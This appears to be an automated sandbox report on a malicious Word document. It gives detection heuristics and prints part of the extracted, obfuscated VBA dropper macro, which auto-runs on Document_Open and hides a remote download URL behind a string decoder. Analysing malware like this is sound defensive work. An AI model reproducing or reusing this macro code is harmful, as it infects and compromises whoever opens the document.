Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macro's obfuscated nature and the presence of a ClamAV detection for 'Doc.Dropper.Donoff' suggest it functions as a dropper for further malicious activity. No specific URLs or executable payloads were directly extracted, but the presence of the macro itself is a primary indicator of compromise.
Heuristics (7)

- ClamAV: Doc.Dropper.Donoff-5743527-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18031 bytes |

SHA-256 of macros.bas: f63e06ef0dcefeb5abe3737548f122ac5b493376710868dbeae6f5afaafe596c
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ADyFTx(ByVal CgWoSQjzHjT As Integer) As String
fVFlsZvAGnN
DlaETM 8198
If WjwqSCprAY(8828, "g8cmO") Then
onngWEjomOb
efQuDr = 7276
phdhFqPet 4905, "2A8"
ROrVaZgw
End If
FOQMOpsSXviN = "mjyc"
ADyFTx = "w6Pq"
End Function
Private Function dyUGaG() As Integer
diAEJELg False
TLzuTkqYu 2233, ""
ZQygxzYT
dyUGaG = 5204
End Function
Private Function tabNKagntJY() As String
If fxAbkgh(9126) Then
GpkJxYKjpOIt = 8634
ZsoIHSZY
Else
ZTYIECdlBdJJpy True
mXRcYUOVy
YsiMIRYYsyQFA
End If
hRSYbhy = True
tabNKagntJY = "6w"
End Function
Private Sub Document_Open()
bZAKvCxsaNaCq.yauawLmTpMP
End Sub
Private Function SudFVebpzoSELc(ByVal bsOLdclsyS As String, ByVal xSScZGtFiv As Integer) As Integer
MpfRWL 4374
xAfZurdXxYfeox
hpHwyvtxihSp
If qwJjTuKaBNY Then
cBtVwonu
Else
lHwXMX = "TJqY"
IVKilfjXs
lvLddIquiB
End If
SudFVebpzoSELc = 1337
End Function
Attribute VB_Name = "bZAKvCxsaNaCq"
Private Function AeaAXhVCVSLS(ByVal vhchbwp As Object, ByVal GfUxxcBfQ As Boolean) As Object
Dim GzkmODfOFbEh As Integer
SbtSUAqECTM = False
Set AeaAXhVCVSLS = vhchbwp
End Function
Public Sub yauawLmTpMP()
On Error GoTo aqudCgOf
hmPKPmyzXmp.lybeoEjW
kNCirpZWqsypXG = True
hmPKPmyzXmp.sOxIFCii
gtWIiGhAwS
Exit Sub
koCuBCfpBwJh = 5724
aqudCgOf:
End Sub
Private Sub gtWIiGhAwS()
Dim JwDDyEbVemyCr As String
Dim IsdRUPEoRZ As Integer
XbuAEIm = "IYI"
UmlXAWtHKdw 5737, MfTHfAcnroPMLw.noeWbokFGF, eWQFeJuA
dUusZxEWDaVPS = 6867
MfTHfAcnroPMLw.naIiwVSlWBzsrt 6258, MfTHfAcnroPMLw.noeWbokFGF
End Sub
Public Function OJRcJZpy(ByVal KkxvmPOfM As String) As Object
Dim imYIO As String
Dim NMeHIa As Boolean
qqwJdRlWAaeB = "XAat5"
Set OJRcJZpy = AeaAXhVCVSLS(CreateObject(KkxvmPOfM), True)
End Function
Private Function gqWTnauSfBS(ByVal HFQRSRCZHeRy As String) As Integer
If ZDVMa(8404, "mUwj") Then
VdhiTjzETz = 7354
aooyVBUADFXG
FjRSXtpNDqrD
UDEVys
laoBVtULCq = "QA"
Else
CBdyXPbcdBQBER
PNCAwHQlRxPtOf "vWyPE", 4897
ZyexuXTXn
End If
pOAPP 4147, 3708, 9625
gqWTnauSfBS = 2465
End Function
Private Sub UmlXAWtHKdw(ByVal vgXGtMqQdxUL As Integer, ByVal LLvaWp As String, ByVal zlLEgEJHIEfbBR As String)
Dim esSCO As Integer
Set NeMRpdo = NOcDCWAO.jDZhFQQYMNoGW(zlLEgEJHIEfbBR, 7913, True)
NOcDCWAO.LYzyqSkSxHkbpL "Gr4", SfVtjCsSEYmyHd, 3895, NeMRpdo
twxQt = True
MfTHfAcnroPMLw.BPBrpPlhhlBHO 6655, OWakHGhp.KdtDflEoRvO(2621, NeMRpdo, "J4z1", JzINhfXtVzDXe.PIMFZOqbAQ("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "7nXdJ", LLvaWp
End Sub
Private Function eWQFeJuA() As String
eWQFeJuA = JzINhfXtVzDXe.PIMFZOqbAQ("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function SfVtjCsSEYmyHd() As String
SfVtjCsSEYmyHd = JzINhfXtVzDXe.PIMFZOqbAQ("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "JzINhfXtVzDXe"
Private Sub scpORnPjPmTjo()
JpOxkbULw False, 4187, False
JTsNEUMEpR 3928, True, 3091
End Sub
Public Function UtEhFOdfv(ByVal FdcsXzlIM As String, ByVal fMgPBDqFgaC As Boolean, ByVal JFEkqNT As String) As String
Dim daEQyVRqXshj As Boolean
Dim ZBpvLfaCKlgvbE As Integer
wMylbtKngxioTG = "Bg"
UtEhFOdfv = FdcsXzlIM & JFEkqNT
End Function
Private Sub aOnTynXMRkFxez()
hWAxjl 3835, "5ApD", 8764
LdNdwi 5484, 760, 7177
vDIVF = 3182
JXFSmpl
End Sub
Private Function oRuQLJAznOaIrJ(ByVal sWCnPi As String, ByVal kQlzlXsNgj As String) As String
If Not RInLQb.iCcbaRfYFq("", kQlzlXsNgj, sWCnPi, "1o8tx") Then
oRuQLJAznOaIrJ = kQlzlXsNgj
End If
End Function
Private Function SzVdJPA() As Integer
tabbZPGjk = "nac"
SzVdJPA = 1
End Function
Public Function PIMFZOqbAQ(ByVal VhcvpdJv As String, ByVal nFSYJ As String) As String
Dim qKcDzz As String
Dim FfwawFLrgXDPl As String
Dim ZSpBbBPT
... (truncated)
```